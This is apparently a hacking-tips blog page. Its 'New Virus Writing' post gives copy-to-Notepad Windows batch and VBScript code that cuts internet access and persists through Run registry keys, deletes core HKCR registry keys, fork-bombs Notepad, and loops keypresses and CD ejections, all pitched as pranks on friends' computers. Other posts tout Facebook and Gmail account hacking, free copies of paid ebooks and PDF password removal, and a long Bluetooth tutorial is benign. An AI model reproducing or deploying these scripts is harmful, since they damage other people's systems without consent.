Download Microsoft office 2013 Now!

Microsoft has just released the free preview version of the all new Microsoft Office 2013. You can now download Microsoft Office 2013 immediately on your computer to try it.

How to Access Blocked Websites Without Proxy

Access your favorite blocked website and social networking sites at your or college or your workplace without proxy.Download exciting software to access blocked websites.

Make a Very Dangerous Virus with Notepad

Now make your own viruses in Notepad. Make fun with these in your friends computer.

How to remove PDF password

In some PDF files, Owner set the password to that file. It restrict the print, copy or edit the content of PDF file. In such situation PDF password remover application help you to remove password.

How to bypass Surveys on websites

Many websites makes survey to proceed the download or to visit the website. These surveys prove to b headache. To bypass these surveys, there are some tricks to follow.

Showing posts with label Tutorial. Show all posts
Showing posts with label Tutorial. Show all posts

Thursday, 18 July 2013

Hack FACEBOOK using Backtrack

Hello, friends I am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.

Things you needed are following:
1. Backtrack 5 R2 
2. Internet connection 

Now follow all my steps like I am showing in this post:

Monday, 8 April 2013

Best 5 Hacking Ebooks to Learn Ethical Hacking

Hey, Many of you want to learn Hacking, my previous articles of Top 5 Websites To Learn How To Hack Like Hackers we have seen Top 5 Best forum and website to learn like hackers. because there are many hackers used to share their knowledge but what about the basic knowledge, a hackers ( no matter what type of but a well-knowledge and experience ) is never interested to teach you "Basics of Hacking", today i'm posting 5 awesome all time best basics of hacking ebooks, this ebook are not free but don't worry in the end of the articles i'll show you a simple way to get any ebooks for FREE.....

1# The secret of Hacking 1 Edition : this book is awesome for those whom have 0 knowledge in hacking and want to learn hacking, its good start up for them. In order to get this book you have order this book from the official website of this ebook. but if you know How to do some tricky search you can get it from google for FREE
Have a look at the Content of this ebook 
 


1. Introduction to real Hacking
2. Advanced Malware research
3. Windows Hacking
4. Password Hacking
5. Email Hacking
6. Web Application Hacking
7. Website Defacement Domain Hacking
8. Miscellaneous Hacking
9. Mobile Computer Forensic
10. VoIP Wireless Hacking
11. Vulnerability discovery Penetration testing
12. Advanced Hacking with Metasploit
13. Firewall, IDs Honey pot Hacking
14. Securing System Networks.

2# Social Engineering: The Art of Human Hacking  
 Kevin Mitnick the most famous all time best top 1 social engineers proved how social engineers dangerous and can Hack Human with the art of social engineering, as the book name implies this books reveal all the secret of social engineering. this is very intresting ebook rather then other because for computer hacking you need the computer device, Internet and a knowledge so you know what you are going to do. but for social engineering you don't need any of this, you need to learn how to manipulate people mind so they will do what you want to do from them. Download awesome ebook from direct link.

3# Dangerous Google - Searching For Secrets
every hackers must have good skills of googling, you might heart it somewhere on internet that google is a best friend of hackers, this will let you help to understand how google is best friend of every hackers. you may able get many paid stuff from google for free like ebooks, mp3, stockimage, etcs. main object of this ebook is "how to use google to find sources of personal and other confidential data. how to find information about vulnerable systems and web services. how to locate publicly available network deivc using google". Download this ebook from here

4# Gray Hat Hacking The Ethical Hackers Handbook, 3rd Edition
Gray hat hacking book is something of advance users who might already have much knowledge of hacking or beginners, unlike other hacking book this book is helpful for ethical hackers in fixing security loopwhole, testing the black and white box, write malicious code, fixing exploit flaws in linux n windows OS, penetration testing, VoiP and other web seuciryt, developing exploit code and let's see the topic of this ebook. Download this awesome book here.

  1. Develop and launch exploits using BackTrack and Metasploit.
  2. Employ physical, social engineering, and insider attack techniques.
  3. Build Perl, Python, and Ruby scripts that initiate stack buffer overflows.
  4. Understand and prevent malicious content in Adobe, Office, and multimedia files.
  5. Detect and block client-side, Web server, VoIP, and SCADA attacks.
  6. Reverse engineer, fuzz, and decompile Windows and Linux software.
  7. Develop SQL injection, cross-site scripting, and forgery exploits.
  8. Trap malware and rootkits using honeypots and SandBoxed.


5# Hardware Hacking Have Fun While Voiding Your Warranty
About this ebook some description of this ebook by the author
"If I had this book 10 years ago, the FBI would never have found me!" -- Kevin Mitnick This book has something for everyone---from the beginner hobbyist with no electronics or coding experience to the self-proclaimed "gadget geek." Take an ordinary piece of equipment and turn it into a personal work of art. Build upon an existing idea to create something better. Have fun while voiding your warranty!
This book is Gadget geeky ebook which help you to learn how to hack and repair yourself play-station 2, old mac computer,hacking apple ipod , Hard-drive, Home Theater PCs, Hack Wireless 802.11, Nokia 6210 modification, Operating system, Coding and many more. Get this awesome book from here.

Tuesday, 26 March 2013

New Virus Writing

Note>> I am not responsible for any damage or error reporting in Your PC do it as your own risk. These coding only for knowledge concept .

All Scripts Here Are To Be Copied In Note Pad

1. Disable Internet Permanently

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED!
PAUSE

2. Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]

This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*

Code:-

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been craxhed.  Have a nice day.
GOTO MESSAGE


3. Endless Notepads

*This will pop up endless notepads until the computer freezes and crashes*

Code:-

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


4. Popping CD Drives

*This will make the CD drives constantly pop out*

Code:-

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

5. Endless Enter

*This constantly makes it so the enter button is being pressed continuesly*

Code:-

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop


For more virus writing, please comment or you can mail us.
Email: cybercracker3@gmail.com

IP Spoofing [PDF Article]


The term IP (Internet Protocol) address spoofing refers to the creation of IP packets with a forged (spoofed) source IP address with the purpose of concealing the identity of the sender or impersonating another computing system.

Why it works?

How it works?

To know the answers of your questions on TCP/IP, download this below article:

Tuesday, 19 February 2013

Bluetooth

Bluetooth is a wireless technology standard for exchanging data over short distances (using short-wavelength radio transmissions in the ISM band from 2400–2480 MHz) from fixed and mobile devices, creating personal area networks (PANs) with high levels of security. Created by telecom vendor Ericsson in 1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can connect several devices, overcoming problems of synchronization.

Now explore the some knowledge of Bluetooth :-

TABLE OF CONTENTS:

  1. Bluetooth Technology
  2. Applications
  3. Working
  4. History
  5. Latest Research, Facts and Problems

5. Latest Reseach, Facts and Problems in Bluetooth


Latest Research
A lot of research is currently underway to harness the power of Bluetooth technology in the healthcare domain. With the help of Bluetooth, health conscious individuals will have access to wireless devices to record information pertaining to body temperature, pressure count and metabolism. The Bluetooth enabled devices will first collect vital information with the patients and then share it with a doctor via a mobile phone or PC.
Compatible mobile phones will be better equipped with new dual-mode chips that support both traditional Bluetooth technology and other low-energy applications.
The low energy communicates with lightweight health sensors, while the traditional Bluetooth specification continues to operate with existing Bluetooth-enabled products such as hands-free headsets. This enables cell phone manufacturers to add dual-mode capabilities without significant increase in product pricing.


Interesting Facts
·         Renowned Andretti Green Racing team communicated during the race using Bluetooth devices.
·         Surveys show that 1/3rd of all new cars in the world will have Bluetooth capability.
·         Bluetooth-enabled medical equipment is presently being manufactured to be deployed at hospitals.
·         Bluetooth lets you watch video files or pictures on your TV screen. This is possible by using a laptop as a source to relay the media files.


Problems Faced
Just like any other technology, Bluetooth does have certain issues regarding its use.
For two Bluetooth-enabled devices to function in tandem, they should be provided with the same profile. For example, to connect a mobile phone to your headset, you will need matching profiles in both devices. In this scenario, a hand free is the correct profile. Similarly, a basic printing profile will be required if you want to print a document on your phone through a Bluetooth-enabled printer. You will have to keep ensuring that profiles match for smooth functioning of your Bluetooth devices.
To ensure that two Bluetooth devices work together, they have to be paired. Pairing would require both devices exchanging passkeys. Once paired, all data sent between the two devices gets encrypted, meaning that any device that is not paired with the other two is unable to translate the data. Pairing between two devices may fail and the most frequent reason for this is the usage of wrong password.
As the technology advances, more issues pertaining to Bluetooth are bound to pop up. Luckily, most issues are easy to deal with.

<< 4. History of Bluetooth                                                                                                                        Go to Index

4. History of Bluetooth

History
Bluetooth was developed by Ericsson which is a Danish company. It was developed in 1994, but only in 1998 Ericsson presented it to several other big companies, and they agreed to make it an industry standard.
Bluetooth, the protocol that promised to connect all your different gadgets from different companies/makers, is named Bluetooth after a Viking King called Harald Bluetooth, who got his name because of his fondness for blueberries, which stained his teeth. King Harald Bluetooth was famous for uniting the warring tribes of Scandinavia, just like our Bluetooth Protocol, uniting different technologies.
1998
·         The birth of Bluetooth with the formation of Bluetooth Special Interest Group (SIG).
·         Bluetooth is officially adopted as the name for the technology.
1999
·         1.0 Specification is officially released.
·         Bluetooth is declared the "Best of Show Technology Award" by COMDEX.
2000
·         For the first time, Bluetooth-enabled mobile phone, PC card, mouse, headset and laptop are unveiled.
·         USB dongle prototype unveiled at COMDEX.
2001
·         Bluetooth SIG Inc. is formed.
·         First hands-free car kit is launched.
2002
·         First GPS receiver and Bluetooth enabled digital camera.
·         IEEE approves 802.15.1 specification for Bluetooth technology.
2003
·         First Bluetooth-enabled MP3 player launched.
·         First FDA-approved Bluetooth-enabled medical system.
2004
·         Bluetooth SIG adopts Enhanced Data Rate (EDR).
·         Bluetooth technology embedded in 250 million devices.
·         First Bluetooth-enabled stereo headphones launched.
2006
·           Bluetooth is installed in 1 billion devices.

<< 3. Bluetooth Working                                                     5. Latest Research, Facts and Problems >>

3. How Bluetooth Technology Works

Working

Bluetooth technology was discovered to have wireless protocols to connect several electronic devices and as a solution to synchronize the data. The Bluetooth standard is maintained by the Bluetooth Special Interest Group.
At the physical layer, the Bluetooth RF transceiver is positioned. At around 79 Bluetooth channels are placed with a space of 1MHz. Transmission of data and voice are achievable at short distances and thereby creating Wireless PANs.
A Bluetooth device is comprised of an adapter. A Bluetooth adapter can be available in the form of a card to connect the device or integrated into an electronic device.
Link Management Protocol (LMP) is responsible for peer – to – peer message exchange when the electronic devices interfere in each other’s radio range. This layer creates the link and negotiation of packet size. If required this layer can perform the segmentation and reassembling of the packets.
The Bluetooth device enabled by the Service delivery protocol joins the piconet and enquires with all the services available. A piconet has a star topology with one master and seven slaves. The concept of Master and Slave is used in the Bluetooth technology. Only after the master takes the initial action, the devices can begin to talk. Bluetooth GloballD is exchanged among the electronic devices and a connection is build up after the profiles are matched.
Frequency hopping is used in the Bluetooth technology to avoid interfering with other signals. After the packet is transmitted or received, the Bluetooth signal hops to a new frequency. Each packet can cover five time slots.
The Bluetooth technology supports asynchronous data channel, or 3 simultaneous synchronous voice channels, or a channel which supports asynchronous data and synchronous voice.

<< 2. Applications                                                                                                             4. History of Bluetooth >>

2. Bluetooth Applications

The first and foremost application of Bluetooth technology would be to eradicate the tangling of cables that would mess up the room.

  1. Bluetooth’s biggest contribution is to provide a phone with a headset that works wirelessly. This is possible by providing the caller with an earpiece and a small microphone attached to the caller’s shirt. The mobile phone can be located in a bag or anywhere in the body. The caller can dial a number even without touching a button on the mobile phone. This technology has the advantage of eliminating the radiation hitting the cerebral region.
  2. PDA, PC or laptop which has enabled Bluetooth can communicate with each other and update with its latest information. This technology has helped in synchronizing the data easily.
  3. It is difficult to send emails while travelling in a flight. On landing of the flight, the Bluetooth enabled laptop can send the email only when it gets in touch with the user’s phone.
  4. Wireless mouse and keyboards are introduced.
  5. One will be alerted on his/her mobile phone when your laptop receives the mail.
  6. One will be alerted on his/her mobile phone when your laptop receives the mail.
<< 1. Bluetooth Technology                                                                                         3. How Bluetooth works >>

Monday, 18 February 2013

1. Bluetooth Technology

What is Bluetooth?
      Bluetooth is a wireless technology used to transfer data between different electronic devices. The distance of data transmission is small in comparison to other modes of wireless communication. This technology eradicates the use of cords, cables, adapters and permits the electronic devices to communicate wirelessly among each other.  

The key features of Bluetooth technology:
  • Less complication
  • Less power consumption
  • Available at cheaper rates
  • Robustness

Bluetooth technology permits hands free headset for incoming voice calls, ability of printing and fax, and automatic synchronization of PDA.
Classification
Various types of Bluetooth technology are available in the markets which help the consumers to communicate wirelessly. The different types of Bluetooth devices are PC cards, radios, dongles, and headsets. Laptops and other Internet enabled equipments use Bluetooth technology such as wireless mouse and keyboard to communicate wirelessly. Music players like iPods, music phones, or other MP3 players make use of stereo headphones.

Go to Index                                                                                                      2. Bluetooth Applications >>

Search